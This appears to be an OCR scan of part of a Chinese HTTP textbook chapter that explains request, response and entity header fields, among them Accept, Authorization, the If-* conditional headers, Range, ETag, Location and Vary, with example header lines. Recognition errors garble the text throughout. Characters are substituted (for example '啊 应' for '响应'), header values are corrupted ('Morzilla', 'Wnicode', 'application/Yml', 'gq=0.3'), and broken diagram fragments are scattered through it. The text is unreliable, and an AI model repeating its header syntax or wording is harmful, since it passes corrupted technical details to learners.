NTEXT 尾 式 的 包 行 下 









Accept: text/plain; gq=0.3, text/htm 
y HTML 格 式 
恒 
= 服务 器 = 
HTML 格式 TEXT 格式 


Accept: text/html,application/xhtml+xml ,application/Yml;q=0.9,*/*;q=0.8 


Accept 首部 字段 可 通知 服务 需 ， 用 户 代理 能 够 处 理 的 媒体 类 型 及 媒 
体 类 型 的 相对 优先 级 。 可 使 用 type/subtype 这 种 形式 ， 一 次 指定 多 种 媒 
体 类 型 。 

下 面 我 们 试 举 几 个 媒体 类 型 的 例子 。 


@ 文本 文件 
text/html, text/plain, text/css ... 
application/xhtml+xml, application/xml ... 
9 图 请 文件 
image/jpeg, image/gif, image/png ... 
9 视频 文件 
video/mpeg, video/quicktime ... 
e 应 用 程序 使 用 的 二 进 制 文件 


application/octet-stream, application/zZip ... 


比如 ， 如 果 浏览 器 不 支持 PNG 图 片 的 显示 ， 那 Accept 就 不 指定 
image/png， 而 指定 可 处 理 的 image/gif 和 image/jpeg 等 图 片 类 型 。 








夺 想 要 给 显示 的 媒体 类 型 增加 优先 级 ， 则 使 用 q= 来 额外 表示 权重 
值 “， 用 分 号 ( ; ) 进行 分 隔 。 权 重 值 q 的 范围 是 0~1 ( 可 精确 到 小 数 点 后 
3 位 )， 且 1 为 最 大 值 。 不 指定 权重 q 值 时 ， 默 认 权 重 为 q=1.0。 

当 服 务 器 提供 多 种 内 容 时 ， 将 会 首先 返回 权重 值 最 高 的 媒体 类 型 。 


6.4.2 Accept-Charset 











我 查 以 这 个 宇 知 
闻 诈 返回 的 页 面 
” Accept=Charset: iso-8859-5, 
unicode-1-1;q=0.8 





102 字符 集 
Is0-8859-5 
Accept-Charset: iso-8859-5, Wnicode-1-1;q=0.8 


Accept-Charset 自 部 字段 可 用 来 通知 服务 器 用 户 代 理 支 持 的 字符 集 
及 字符 集 的 相对 优先 顺序 。 另 外 ， 可 一 次 性 指定 多 种 字符 集 。 与 首部 字 
段 Accept 相同 的 是 可 用 权重 q 值 来 表示 相对 优先 级 。 

该 和 首部 字段 应 用 于 内 容 协商 机 制 的 服务 器 驱动 协商 。 


中 原文 是 “品质 你 数 "。 在 RFC2616 定 义 中 ,此 处 的 q 是 指 qvalue， 即 quality 
factor。 直 译 的 话 就 是 质量 数 , 但 经 过 综合 考虑 理解 记忆 的 便利 性 后 , 似乎 采 
用 权重 值 更 为 稳妥 。 一 -一 译 者 注 
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6.4.3 Accept-Encoding 





报 文 主体 守 压 晕 也 
没关系 由 





Accept -Encoding: gzip, deflate 


Accept-Encoding 首部 字段 用 来 告知 服务 器 用 户 代 理 支持 的 内 容 编 
码 及 内 容 编 码 的 优先 级 顺序 。 可 一 次 性 指定 多 种 内 容 编 码 。 
下 面试 淮 出 几 个 内 容 编 码 的 例子 。 


® gzip 
由 文件 压缩 程序 gzip ( GNU zip ) 生成 的 编码 格式 ( RFC1952 )， 
来 用 Lempel-Ziv 算法 (LZ77) 及 32 位 循环 宛 余 校 验 (Cyclic 
Redundancy Check， 通 称 CRC )。 
® COmIPress 
由 UNIX 文件 压缩 程序 compress 生成 的 编码 格式 ， 采 用 Lempel- 
Ziv-Welch 算法 (LZW ) 
® dellate 
组 合 使 用 zlib 格式 (RFC1950 ) 及 由 deflate 压缩 算法 (RFC1951 ) 
生成 的 编码 格式 。 


本 
强 03 ] 
Pr) 
管 Ei We 
ra: 


aaa 
® Identity 
不 执行 压缩 或 不 会 变化 的 默认 编码 格式 


采用 权重 9q 值 来 表示 相对 优先 级 ， 这 点 与 首部 字段 Accept 相同 。 
男 外 ， 也 可 使 用 星 号 (* ) 作为 通配符 ， 指 定 任意 的 编码 格式 。 


6.4.4 Accept-Language 





Accept -Language: zh-cn,zh;q=0.7,en-us,en;q=0.3 


首部 字段 Accept-Language 用 来 告知 服务 顺 用 户 代理 能 够 处 理 的 目 
然 语 言 集 ( 指 中 文 或 英文 等 )， 以 及 自然 语言 集 的 相对 优先 级 。 可 一 
指定 多 种 自然 语言 集 。 

和 Accept 首部 字段 一 样 ， 按 权重 值 q 来 表示 相对 优先 级 。 在 上 述 
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se = TCR 


人 





图 例 中 ， 客 尸 端 在 服务 器 有 中 文 版 资源 的 情况 下 ， 会 请 求 其 迟 回 中 文 版 
对 应 的 啊 应 ， 没 有 中 文 版 时 ， 则 请 求 返 回 美 文 版 啊 应 。 


6.4.5 Authorization 


WWW-Authenticate 





这 而 面 军 更 HTTP 认证 ， 
把 你 由 认证 信息 发 给 我 





GET /index .htm 


401 Unauthorized i 
WHW-Authenticate: Basic -- 服务 器 








来 ， 我 把 认证 信息 
发 送 给 你 


GET /index.htm 
Authorization: Basic dWVub3NlbjpwYXNzd29yZA== 





200 OK 


Authorization: Basic dWVuUb3NlbjpwYXNzd29yZA== 


首部 字段 Authorization 是 用 来 告知 服务 器 ， 用 户 代 理 的 认证 信息 
( 证书 值 )。 通常， 想 要 通过 服务 器 认证 的 用 户 代 理会 在 接收 到 返回 
的 401 状态 码 啊 应 后 ， 把 首部 字段 Authorization 加 入 请 求 中 。 共 


用 缓存 在 接收 到 含有 Authorization 首部 字段 的 请 求 时 的 操作 处 理会 





略 有 差异 。 
有 关 HTTP 访问 认证 及 Authorization 首部 字段 ， 稍 后 的 章节 还 会 详 
细 说 明 。 男 外 ， 读 者 也 可 参阅 RFC2616。 


6.4.6 Expect 





你 能 做 到 这 个 o5? i : 
我 只 能 艇 到 100 Conttnue 





Expect: 100-continue 


客 尸 问 使 用 自 部 字段 Expect 来 告知 服务 器 ， 期 望 出 现 的 某 种 特定 
行为 。 因 服务 带 无 法 理解 客户 端的 期 望 作出 回应 而 发 生 错 误 时 ， 会 返回 
状态 码 417 Expectation Failed。 

客户 端 可 以 利用 该 首部 字段 ， 写 明 所 期 望 的 扩展 。 虽 然 HTTP/1.1 
规范 只 定义 了 100-continue( 状态 码 100 Continue 之 意 )。 

等 待 状态 码 100 啊 应 的 客户 端 在 发 生 请 求 时 ， 需 要 指定 Expect: 


100-continue。 
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6.4.7 From 






如 果 有 事 请 联系 
这 不 电子 邮箱 


From: intoaehackr .jp 


首部 字段 From 用 来 告知 服务 器 使 用 用 户 代理 的 用 户 的 电子 邮件 地 
址 。 通常 ， 其 使 用 目的 就 是 为 了 显示 搜索 引擎 等 用 户 代理 的 负责 人 的 
电子 邮件 联系 方式 。 使 用 代理 时 ， 应 尽 可 能 包含 From 首部 字段 (但 可 
能 会 因 代理 不 同 ， 将 电子 邮件 地 址 记录 在 User-Agent 首部 字段 内 )。 107 


6.4.8 Host 


我 有 事 旱 找 他 





Host www.hackr.jp 


大 末 主 机 


Wwww.usagidesign.jp 


图 : 虚拟 主机 运行 在 同一 个 IP 上 ， 因 此 使 用 首部 字段 Host 加 以 区 分 





Host : www.hackr.jp 


首部 字段 Host 会 告知 服务 器 ， 请 求 的 资源 所 处 的 互联 网 主机 名 和 
端口 号 。Host 首部 字段 在 HTTP/1.1 规范 内 是 唯一 一 个 必须 被 包含 在 请 
求 内 的 首部 字段 。 

首部 字段 Host 和 以 单 台 服务 硕 分 配 多 个 域名 的 虚拟 主机 的 工作 机 
制 有 很 密切 的 关联 ， 这 是 首部 字段 Host 必须 存在 的 意义 。 

请 求 被 发 送 至 服务 器 时 ， 请 求 中 的 主机 名 会 用 IP 地 址 卫 接 蔡 换 解 
决 。 但 如 果 这 时 ， 相 同 的 IP 地 址 下 部 署 运行 着 多 个 域名 ， 那么 服务 器 
就 会 无 法 理解 究竟 是 哪个 域名 对 应 的 请 求 。 因 此 ， 就 需要 使 用 首部 字段 
Host 来 明确 指出 请 求 的 主机 名 。 若 服务 器 未 设 定 主机 名 ， 那 直接 发 送 一 
个 空 值 即 可 。 如 下 所 示 。 


Host: 


6.4.9 lf-Match 


|f-Match 

上 上 -Modifiled-Since 

上 f-None-Match 
If-Range 
If-Unmodified-Since 





如 果 你 能 等 合 拿 件 ， 我 
\N\ 斌 会 接受 你 的 请 求 





图 : 附带 条 件 请 求 
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形 如 If-xxx 这 种 样式 的 请 求 首部 字段 ， 都 可 称 为 条 件 请 求 。 服 
务 器 接收 到 附带 条 件 的 请 求 后 ， 只 有 判断 指定 条 件 为 真 时 ， 才 会 执行 
请 求 。 


GET /index .html 
TIE Matoen"i234560 


Pe index.html 


实体 标记 ( ETag ) 
123456 


有 i 






实体 标记 ( ETag ) 是 与 特定 资源 关联 的 
确定 值 。 资 源 更 新 后 ETag 也 会 随 之 更 新 | 





GET /index.htm 
If-Match: "123456" 


I 天 面 醒 面 .大 


开 index.html 


实体 标记 ( ETag ) 





1 mm 


412 Precondition Failed 


图 : 只 有 当 If-Match 的 字段 值 跟 ETag 值 匹配 一 致 时 ， 服 务 器 才 会 接受 请 求 


If-Match: "123456" 


首部 字段 Match， 属 附带 条 件 之 一 ， 它 会 告知 服务 器 匹配 资源 所 
用 的 实体 标记 ( ETag ) 值 。 这 时 的 服务 器 无 法 使 用 弱 ETag 值 。( 请 参 
照 本 章 有 关 首 部 字段 ETag 的 说 明 ) 

服务 需 会 比 对 IfMatch 的 字段 值 和 资源 的 ETag 什 ， 仅 当 两 者 一 致 








es 


时 ， 才 会 执行 请 求 。 反 之 ， 则 返回 状态 码 412 Precondition Failed 的 啊 应 。 
还 可 以 使 用 星 号 (* ) 指定 全 Match 的 字段 值 。 针 对 这 种 情况 ， 服 
务 需 将 会 忽略 ETag 的 值 ， 只 要 资源 存在 就 处 理 请 求 。 


6.4.10 lIf-Modified-Since 


GET /index.htm 
If-Modified-Since: Thu, 15 Apr 2004 00:00:00 GMT 









因为 是 在 2004 年 4 月 
上 日 之 后 重新 过 巾 效 
源 ， 所 以 我 可 以 接受 









200 OK 
Last-Modified: Sun, 29 Aug 2004 14:03:05 GMT 


GET /index.htm 
If-Modified-Since: Thu, 15 Mpr 2004 00:00:00 GMT J 这 份 次 源 在 2004 年 "上 月 


f/f 必 日 之 后 未 更 新 过 ， 所 










304 Not Modified 


图 : 如 果 在 上 -Modified-Since 字段 指定 的 日 期 时 间 后 ， 资 源 发 生 了 更 新 ， 服 务 
器 会 接受 请 求 


If-Modified-Since: Thu, 15 Apr 2004 00:00:00 GMT 


首部 字段 全 Modified-Since， 属 附带 条 件 之 一 ， 它 会 告知 服务 器 大 
If-Modified-Since 字段 值 早 于 资源 的 更 新 时 间 ， 则 和 希望 能 处 理 该 请 求 。 
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而 在 指定 二 Modified-Since 字段 值 的 日 期 时 间 之 后 ， 如 果 请 求 的 资源 都 
没有 过 更 新 ， 则 返回 状态 码 304 Not Modified 的 啊 应 。 

[人 Modified-Since 用 于 确认 代理 或 客户 端 拥 有 的 本 地 资源 的 有 效 
性 。 获 取 资 源 的 更 新 日 期 时 间 ， 可 通过 确认 首部 字段 Last-Modified 来 
确定 。 


6.4.11 上 -None-Match 









我 这 没有 Sample.html， 所 以 
可 以 处 理 你 的 请 求 


PUT /sample.html 
If-None-Match: * 








因为 资源 不 存在 ， 所 以 对 
应 的 ETag 也 不 存在 


哪 





服务 器 


200 OK 


: 只 有 在 If-None-Match 的 字段 值 与 ETag 值 不 一 致 时 ， 可 处 理 该 请 求 。 
与 |f-Match 首部 字段 的 作用 相反 


首部 字段 None-Match 属于 附带 条 件 之 一 。 它 和 首部 字段 下 
Match 作用 相反 。 用 于 指定 IfNone-Match 字段 值 的 实体 标记 ( ETag ) 
值 与 请 求 资源 的 ETag 不 一 致 时 ， 它 就 告知 服务 器 处 理 该 请 求 。 

在 GET 或 HEAD 方法 中 使 用 首部 字段 IfNone-Match 可 获取 最 新 
的 资源 。 因 此 ， 这 与 使 用 自 部 字段 企 Modified-Since 时 有 些 类 似 。 





6.4.12 If-Range 





GET /index.html 
If-Range: "123456" 
Range: bytes=5001-10000 “a ob oe 


图 index.htm 


实体 标记 | ETag ) 





206 Partial Content 
Content-Range: bytes 5001=10000/10000 
Content-Length: 5000 


若 不 一 致 ， 则 忽略 范围 请 求 ， 返 回 全 部 资源 ) 






GET /index.html 
If-Range: "123456" 
Range: bytes=5001-10000 


i 和 站 下 着 本 天 着 是 着 症 天 天 肖 攻 是 用 省 前 省 间 划 省 | 


~ index.htm 


| ETag ) 


tr 
ETag: "567890" 





首部 字段 If-Range 属于 附带 条 件 之 一 。 它 告知 服务 器 车 指定 的 
If-Range 字段 值 ( ETag 值 或 者 时 间 ) 和 请 求 资源 的 ETag 值 或 时 间 相 一 
致 时 ， 则 作为 范围 请 求 处 理 。 反 之 ， 则 返回 全 体 资源 。 
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= 








如 果 不 使 用 首部 字段 -Range 则 需要 进行 两 次 处 理 





GET / 
If-Match: "123456" 412 Precondition Failed 
Range: 5001-10000 z / 














坦 剩余 曲 部 分 
发 给 我 


你 要 网 (部 分 》 丽 沽 已 经 没有 了 
你 重新 再 发 -个 请 求 吧 / 









GET / ETag: "567890" 


下 面 我 们 思考 一 下 不 使 用 首部 字段 If-Range 发 送 请 求 的 情况 。 服 务 
器 端的 资源 如 果 更 新 ， 那 客户 端 持 有 资源 中 的 一 部 分 也 会 随 之 无 效 ， 当 
然 ， 范围 请 求 作 为 前 提 是 无 效 的 。 这 时 ， 服 务 器 会 暂且 以 状态 码 412 
Precondition Failed 作为 响应 返回 ， 其 目的 是 催促 客户 端 再 次 发 送 请 求 。 
这 样 一 来 ， 与 使 用 首部 字段 If-Range 比 起 来 ， 就 需要 花费 两 倍 的 功夫 。 


6.4.13 lf-Unmodified-Since 
If-Unmodified-Since: Thu, 03 Jul 2012 00:00:00 GMT 
首部 字段 IEUnmodified-Since 和 首部 字段 [Modified-Since 的 作用 


相反 。 它 的 作用 的 是 告知 服务 器 ， 指 定 的 请 求 资源 只 有 在 字段 值 内 指 
定 的 日 期 时 间 之 后 ， 未 发生 更 新 的 情况 下 ,才能 处 理 请 求 。 如 末 在 指 





定 日 期 时 间 后 发 生 了 更 新 ， 则 以 状态 码 412 Precondition Failed 作为 响 
应 返回 。 


6.4.14 Max-Forwards 


由 我 返回 响应 柯 





Max-Forwards: 2 Max-Forwards: 1 Max-Forwards: 0 





eT Fr 
3 a 
; 
Mp . 
-5 蛋 人 一 CA 
: 


代理 服务 器 A 





代理 服务 器 B 
加 图 : 每 次 转发 数值 减 1。 当 数值 变 0 时 返回 响应 


Max-Forwards: 10 


通过 TRACE 方法 或 OPTIONS 方法 ， 发 送 包 含 首部 字段 Max- 
Forwards 的 请 求 时 ， 该 字段 以 十 进 制 整数 形式 指定 可 经 过 的 服务 占 最 大 
数目 。 服 务 右 在 往 下 一 个 服务 器 转发 请 求 之 前 ，Max-Forwards 的 值 减 
1 后 重新 赋值 。 当 服务 器 接收 到 Max-Forwards 值 为 0 的 请 求 时 ， 则 不 
再 进行 转发 ， 而 是 直接 返回 啊 应 。 

使 用 HTTP 协议 通信 时 ， 请求 可 能 会 经 过 代理 等 多 人 台 服 务 器 。 途 
中 ， 如 果 代 理 服务 絮 由 于 某 些 原 因 导 致 请 求 转发 失败 ， 客 户 端 也 就 等 不 
到 服务 器 返回 的 啊 应 了 。 对 此 ， 我 们 无 从 可 知 。 

可 以 灵活 使 用 首部 字段 Max-Forwards， 针 对 以 上 问题 产生 的 原因 展开 
调查 。 由 于 当 Max-Forwards 字段 值 为 0 时 ， 服 务 硕 就 会 立即 返回 啊 应 ， 由 
此 我 们 至 少 可 以 对 以 那 台 服务 器 为 终点 的 传输 路 径 的 通信 状况 有 所 把 握 。 


i i 
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和 不 内 响应 ”由 于 未 知 原因 
返回 呢 …… 





”导致 请 求 失败 


EIT i 
-二 





代理 服务 器 和 代理 服务 器 B 


图 : 代理 B 到 源 服务 器 的 请 求 失败 了 ， 但 客户 端 不 知道 





图 : 由 于 未 知 原因 ， 导 致 请 求 陷入 代理 之 间 的 循环 ， 但 客户 端 不 知道 


6.4.15 Proxy-Authorization 


Proxy-Muthorization: Basic dGlwOjkpNLAGEFYS 


接收 到 从 代理 服务 妖 发 来 的 认证 质询 时 ， 客 户 端 会 发 送 包 含 自 部 字 
段 Proxy-Authorization 的 请 求 ， 以 告知 服务 器 认证 所 需要 的 信息 。 

这 个 行为 是 与 客户 端 和 服务 需 之 间 的 HTTP 访问 认证 相 类 似 的 ， 不 
同 之 处 在 于 ， 认 证 行为 发 生 在 客户 端 与 代理 之 间 。 客 户 端 与 服务 器 之 间 
的 认证 ， 使 用 自 部 字段 Authorization 可 起 到 相同 作用 。 有 关 HTTP 访问 





认证 ， 后 面 的 章节 会 作 详尽 曾 述 。 


6.4.16 Range 
ne bytes=5001-10000 


对 于 只 需 获 取 部 分 资源 的 范围 请 求 ， 包 含 首 部 字段 Range 即 可 告知 
服务 器 资源 的 指定 范围 。 上 面 的 示例 表示 请 求 获取 从 第 5001 字 节 至 第 
10000 字 节 的 资源 。 

接收 到 附带 Range 首部 字段 请 求 的 服务 器 ， 会 在 处 理 请 求 之 后 返回 
状态 码 为 206 Partial Content 的 响应 。 无 法 处 理 该 范围 请 求 时 ， 则 会 返 
回 状 态 码 200 OK 的 响应 及 全 部 资源 。 





6.4.17 Referer 


GET / 


只 要 查看 Referer 就 能 知道 请 求 的 





ferer: http://www.hackr .jp/index.htm URI 是 从 哪个 Web 页 面 发 起 的 





这 个 请 求 曲 UR| 星 从 
我 这 里 发 起 巾 





Referer: http://www.hackr.jp/index.htm 


首部 字段 Referer 会 告知 服务 器 请 求 的 原始 资源 的 URI。 
客户 端 一 般 都 会 发 送 Referer 首部 字段 给 服务 器 。 但 当下 接 在 浏览 
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鳃 的 地 址 栏 输入 URI， 或 出 于 安全 性 的 考虑 时 ， 也 可 以 不 发 送 该 首部 
字段 。 

因为 原始 人质 源 的 URI 中 的 查询 字符 串 可 能 含有 ID 和 密码 等 保密 
信息 ， 要 是 与 进 Referer 转发 给 其 他 服务 器 ， 则 有 可 能 导致 保密 信息 的 
泄露 。 

另外 ，Referer 的 正确 的 拼写 应 该 是 Referrer， 但 不 知 为 何 ， 大 家 一 
直 沿 用 这 个 错误 的 拼写 。 


6.4.18 |[E 


TE: gzip, deflate;q=0.5 


首部 字段 TE 会 告知 服务 器 客户 端 能 够 处 理 啊 应 的 传输 编码 方式 及 
相对 优先 级 。 它 和 首部 字段 Accept-Encoding 的 功能 很 相像 ， 但 是 用 于 
传输 编码 。 

首部 字段 TE 除 指定 传输 编码 之 外 ， 还 可 以 指定 伴随 trailer 字段 的 
分 块 传输 编码 的 方式 。 应 用 后 者 时 ， 只 需 把 trailers 赋值 给 该 字段 值 。 


TE: trailers 





i 









User-Agent: Morzilla/5.0 (Windows NT 6.1; 
WOW654) AppleWebkKit/536.11 (KHT™ML, like 
Geckol Chrome/20.0,1132.47 Safari/536.11 


a 







Mozilla/ 5.0 liPhone; CPU iPhone OS 5 0 like 
Mac OS X) AppleWebkit/534.46 (KHT™ML, like 
Gecko) Version/5.1 Mobile/9A334 





118 | 


图 : User-Agent 用 于 传达 浏览 器 的 种 类 


User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/3 
20100101 Firefox/13.0.1 


自 部 字段 User-Agent 会 将 创建 请 求 的 浏览 器 和 用 户 代理 名 称 等 信息 
传达 给 服务 器 。 

由 网 络 朴 虫 发 起 请 求 时 ， 有 可 能 会 在 字段 内 添加 怜 虫 作者 的 电子 邮 
件 地 址 。 此 外 ， 如 果 请 求 经 过 代理 ， 那 么 中 间 也 很 可 能 被 添加 上 代理 服 
务 器 的 名 称 。 
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6.5 ”响应 首部 字段 

响应 首部 字段 是 由 服务 器 端 向 客户 端 返回 啊 应 报 文中 所 使 用 的 字 
段 ， 用 于 补充 啊 应 的 附加 信息 、 服 务 器 信息 ， 以 及 对 客户 端的 附加 要 求 
等 信息 。 





忽 杷 o 啊 应 发 着 过 来 





图 : HTTP 响应 报 文中 使 用 的 首部 字段 


6.5.1 Accept-Ranges 


Accept -Ranges: bytes 





服务 器 
图 : 当 不 能 处 理 范 围 请 求 时 ，Accept-Ranges: none 


Accept-Ranges: bytes 


自 部 字段 Accept-Ranges 是 用 来 告知 客户 问 服 务 右 是 否 能 处 理 汇 围 


请 求 ， 以 指定 获取 服务 器 端 某 个 部 分 的 资源 。 


可 指定 的 字段 值 有 两 种 ， 可 处 理 范围 请 求 时 指定 其 为 bytes， 反 之 


则 指定 其 为 none。 


I 





这 个 强 右 向 天 眼 务 器 确 \A | 
过 ， 现 已 过去 3 了 10 分 钟 





Age: 600 





缓存 服务 化 源 服务 器 


Age: 600 


首部 字段 Age 能 告知 客户 端 ， 源 服务 融 在 多 入 前 创建 了 啊 应 。 子 段 


值 的 单位 为 秒 。 
熙 创建 该 啊 应 的 服务 需 是 缓存 服务 器 ，Age 值 是 指 缓 存 后 的 啊 应 再 次 
发 起 认证 到 认证 完成 的 时 间 值 。 代 理 创建 啊 应 时 必须 加 上 首部 字段 Age。 


6.5.3 上 Tag 


Ls 
| index.htm 


ETag: usagi-1234 











JRI 昌 没 有 变 ， 但 四 
新 后 。ETag 值 会 隐 ， 


出 Index.htrm aa 


ETag: usagi-5678 
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一 


“ETag: "82e22293907ce725faf67773957acd12" 


自 部 字段 ETag 能 告知 客户 端 实体 标识 。 它 是 一 种 可 将 资源 以 字符 
串 形式 做 唯一 性 标识 的 方式 。 服 务 器 会 为 每 份 资源 分 配对 应 的 ETag 值 。 

另外 ， 当 资源 更 新 时 ，ETag 值 也 需要 更 新 。 生 成 ETag 值 时 ， 并 没 
有 统一 的 算法 规则 ， 而 仅仅 是 由 服务 器 来 分 配 。 








视 源 曲 URI 昌 然 相同 ， 但 
中 文 版 和 英文 版 对 应 风 净 
源 星 和 不同 同 






服务 絮 ETag: usagi-abcd ETag: usagi-efgh 


宽 源 被 缓存 时 ， 就 会 被 分 配 唯一 性 标识 。 例 如 ， 当 使 用 中 文 版 的 浏 
斋 储 访 辐 ] http : //www.google.com/ 时 ， 就 会 返回 中 文 版 对 应 的 资源 ， 而 
使 用 英文 版 的 浏览 器 访问 时 ， 则 会 返回 英文 版 对 应 的 资源 。 两 者 的 URI 
是 相同 的 ， 所 以 仅 赁 URI 指定 缓存 的 资源 是 相当 困难 的 。 者 在 下 载 过 
程 中 出 现 连接 中 断 、 再 连接 的 情况 ， 都 会 依照 ETag 值 来 指定 资源 。 


强 ETag 值 和 弱 Tag 值 
ETag 中 有 强 ETag 值 和 弱 ETag 值 之 分 。 


强 ETag 值 
强 ETag 值 ， 不 论 实体 发 生 多 么 细微 的 变化 都 会 改变 其 值 。 


ETag: "usSagi-1234" 





弱 ETag 值 
罚 ETag 值 只 用 于 提示 资源 是 否 相 同 。 只 有 资源 发 生 了 根本 改变 ， 产 
生 差 异 时 才 会 改变 ETag 值 。 这 时 ,会 在 字段 值 最 开始 处 附加 W/。 


ETag: W/"usagi-1234" 


6.5.4 Location 


、 你 村 测 览 提出 面 已 袖 
| 转 穆 ， 去 那 边 看 吧 ! 


GET /sample.htm 





www.hackr.jp 


302 Found 
那 我 到 那里 去 看 Location: http://www.usagidesiqn.jp/sample.htm 





GET /sample.htm 





200 OK 


Www.usagidesign.jp 


Location: http://www.usagidesign.jp/sample.html 
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使 用 首部 字段 Location 可 以 将 响应 接收 方 引 导 至 某 个 与 请 求 URI 
位 置 不 同 的 资源 。 

基本 上， 该 字段 会 配合 3xx : Redirection 的 响应 ， 提 供 重 定向 的 
URI., 

几乎 所 有 的 浏览 硕 在 接收 到 包含 首部 字段 Location 的 啊 应 后 ， 祁 会 
强制 性 地 等 试 对 已 提示 的 重 定 癌 资源 的 访问 。 


6.5.5 Proxy-Authenticate 
Proxy-Authenticate: Basic realm="Usagidesign Auth" 


首部 字段 Proxy-Authenticate 会 把 由 代理 服务 需 所 要 求 的 认证 信息 
发 送 给 客户 端 。 

它 与 客户 端 和 服务 器 之 间 的 HTTP 访问 认证 的 行为 相似 ， 不 同 之 处 
在 于 其 认证 行为 是 在 客户 端 与 代理 之 间 进 行 的 。 而 客户 端 与 服务 闫 之 间 
进行 认证 时 ， 首 部 宇 段 WWW-Authorization 有 着 相同 的 作用 。 有 关 
HTTP 访问 认证 ， 后 面 的 章节 会 再 进行 详尽 阐述 。 


6.5.6 Retry-After 





明天 咯 点 再 来 访问 呢 


Retry-After: 120 





首部 字段 Retry-After 告知 客户 端 应 该 在 多 久之 后 再 次 发 送 请 求 。 主 
要 配合 状态 码 503 Service Unavailable 响应 ， 或 3xx Redirect 啊 应 一 起 
使 用 。 

字段 值 可 以 指定 为 具体 的 日 期 时 间 (Wed, 04 Jul 2012 06: 34: 24 
GMT 等 格式 )， 也 可 以 是 创建 啊 应 后 的 秒 数 。 


6.5.7 Server 





Server: Apache/2.2.17 (Unix) 


首部 字段 Server 告知 客户 端 当 前 服务 器 上 安装 的 HTTP 服务 器 应 用 
程序 的 信息 。 不 单单 会 标 出 服务 器 上 的 软件 应 用 名 称 ， 还 有 可 能 包括 版 
本 号 和 安装 时 局 用 的 可 选项 。 


Server: Apache/2.2.6 (Unix) PHP/5.2.5 
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6.5.8 Vary 
GET /sample.html GET /sample.html 
Accept -Language: en-us Accept -Language: en-us 










只 能 对 持 相同 自然 语言 
( AcceFt-Languase ) 的 请求 返 
锯 在 


图 : 当代 理 服务 器 接收 到 带 有 Vary 首部 字段 指定 获取 资源 的 请 求 时 ， 如 果 使 用 
的 Accept-Language 字段 的 值 相同 ， 那 么 就 直接 从 缓存 返回 响应 。 反 之 ， 
则 需要 先 从 源 服务 器 端 获取 资源 后 才能 作为 响应 返回 


Vary: Accept -Language 


首部 字段 Vary 可 对 缓存 进行 控制 。 源 服务 器 会 问 代 理 服 务 顺 传达 
关于 本 地 缓存 使 用 方法 的 命令 。 

从 代理 服务 器 接收 到 源 服务 器 返回 包含 Vary 指定 项 的 啊 应 之 后 ， 
若 再 要 进行 缓存 ， 仅 对 请 求 中 含有 相同 Vary 指定 首部 字段 的 请 求 返 
缓存 。 即 使 对 相同 资源 发 起 请 求 ， 但 由 于 Vary 指定 的 首部 字段 不 相同 ， 
因此 必须 要 从 源 服务 器 重新 获取 帝 源 。 


6.5.9 WWW-Authenticate 


WHW-Authenticate: Basic realm="Usagidesign Auth" 





服 而 加 虱 属 
夯 届 而 国 
本 且 且 国有 


首部 字段 WWW-Authenticate 用 于 HTTP 访问 认证 。 它 会 告知 客户 
端 适 用 于 访问 请 求 URI 所 指定 资源 的 认证 方案 ( Basic 或 是 Digest ) 和 
带 参 数 提示 的 质询 ( challenge )。 状 态 码 401 Unauthorized 啊 应 中 ， 肯 定 
种 有 首部 字段 WWW-Authenticate。 

上 述 示例 中 ，realm 字段 的 字符 串 是 为 了 辨别 请 求 URI 指定 资源 所 
受到 的 保护 荣 略 。 有 关 该 利 部 ， 请 参阅 本 章 之 后 的 内 容 。 


6.6 ”实体 首部 字段 


实体 首部 字段 是 包含 在 请 求 报 文 和 啊 应 报 文中 的 实体 部 分 所 使 用 的 
首部 ， 用 于 补充 内 容 的 更 新 时 间 等 与 实体 相关 的 信息 。 





图 : 在 请 求 和 响应 两 方 的 HTTP 报 文中 都 含有 与 实体 相关 的 首部 字段 


6.6.1 Allow 


在 我 这 动 只 能 使 用 GET 
和 HEAD 方法 呵 





Allow: GET, HEAD 


Allow: GET, HEAD 
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首部 字段 Allow 用 于 通知 客户 端 能 够 支持 Request-URI 指定 资源 的 
所 有 HTTP 方法 。 当 服务 器 接收 到 不 支持 的 HTTP 方法 时 ， 会 以 状态 码 
405 Method Not Allowed 作为 啊 应 返回 。 与 此 同时 ， 还 会 把 所 有 能 文 持 
的 HTTP 方法 写 人 首部 字段 Allow 后 返回 。 


6.6.2 Content-Encoding 
ct oad: gzip 
首部 字段 Content-Encoding 会 告知 客户 端 服 务 器 对 实体 的 主体 部 分 


选用 的 内 容 编 码 方式 。 内 容 编 码 是 指 在 不 丢失 实体 信息 的 前 提 下 所 进行 










”我 已 撑 这 种 方式 进行 了 压 纺 ， 
之 后 曲解 压 工 作 就 秤 托 你 了 


主要 采用 以 下 4 种 内 容 编码 的 方式 。( 各 方式 的 说 明 请 参考 6.4.3 市 
Accept-Encoding 下 部 字段 )。 


® gzip 
s compress 
® deflate 


® identity 


oe 


6.6.3 Content-Language 


该 次 浙 是 中 文风 





Content -Language: zh-CN 


首部 字段 Content-Language 会 告知 客户 疾 ， 实 体 主体 使 用 的 目 然 碚 
言 ( 指 中 文 或 英文 等 语言 )。 


6.6.4 Content-Length 





服务 器 


Content-Length: 15000 


首部 字段 Content-Length 表明 了 实体 主体 部 分 的 大 小 (单位 是 字 
节 )。 对 实体 主体 进行 内 容 编码 传输 时 ， 不 能 再 使 用 Content-Length 盲 
部 字段 。 由 于 实体 主体 大 小 的 计算 方法 略微 复杂 ， 所 以 在 此 不 再 展开 。 


读者 若 想 一 探究 竟 ， 可 参考 RFC2616 的 4.4。 
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6.6.5 ” Content-Location 
‘Content-Location: http://www.hackr.jp/index-ja.html 


首部 字段 Content-Location 给 出 与 报 文 主体 部 分 相对 应 的 URI。 和 
首部 字段 Location 不 同 ，Content-Location 表示 的 是 报 文 主体 返回 资源 
对 应 的 URI。 

比如 ， 对 于 使 用 首部 字段 Accept-Language 的 服务 大 驱动 型 请 求 ， 
当 返 回 的 页 面 内 容 与 实际 请 求 的 对 象 不 同时 ， 首 部 字段 Content- 
Location 内 会 写 明 URI。( 访 问 http://www.hackrjp/ 返回 的 对 象 却 是 
http://www.hackr.jp/index-ja.html 等 类 似 情况 ) 


6.6.6 Content-I MDS 





报 文 主体 
MD5 算 法 


Base64 编码 


Content -MD5: 
OGFKkZDUwWwNGVINNGY3N2MxMD 
IWZ2mMOANTBRMY2IYyTY== 





客户 妆 


图 : 客户 端 会 对 接收 的 报 文 主体 执行 相同 的 MD5 算 法 ， 然 后 与 首部 字段 
Content-MD5 的 字段 值 比较 


